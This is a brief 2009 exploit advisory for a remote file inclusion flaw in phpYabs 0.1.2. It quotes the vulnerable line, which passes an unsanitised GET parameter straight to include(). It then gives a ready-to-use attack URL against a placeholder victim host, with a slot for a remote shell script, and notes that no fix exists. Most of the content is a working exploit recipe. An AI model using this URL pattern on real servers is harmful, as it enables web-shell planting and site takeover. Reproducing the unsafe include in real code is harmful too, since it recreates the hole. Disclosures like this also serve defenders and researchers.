phpYabs 0.1.2 (Azione) Remote File Inclusion Vulnerability

2009-02-06 23:31:58

********************************************************************************
phpyabs 0.1.2 RFI Vulnerability

********************************************************************************
FOUND BY: Arka69
BUG: Remote File Include (RFI)
CMS: phpyabs 0.1.2
SITE: http://exploita.altervista.org
********************************************************************************

VULNERABLE CODE: (phpyabs/moduli/libri/index.php)

include($_GET['Azione'].".php");

********************************************************************************
RFI:

http://victim.com/phpyabs/moduli/libri/index.php?Azione=[SHELL]

#

Fixes

No fixes

In order to submit a new fix you need to be registered.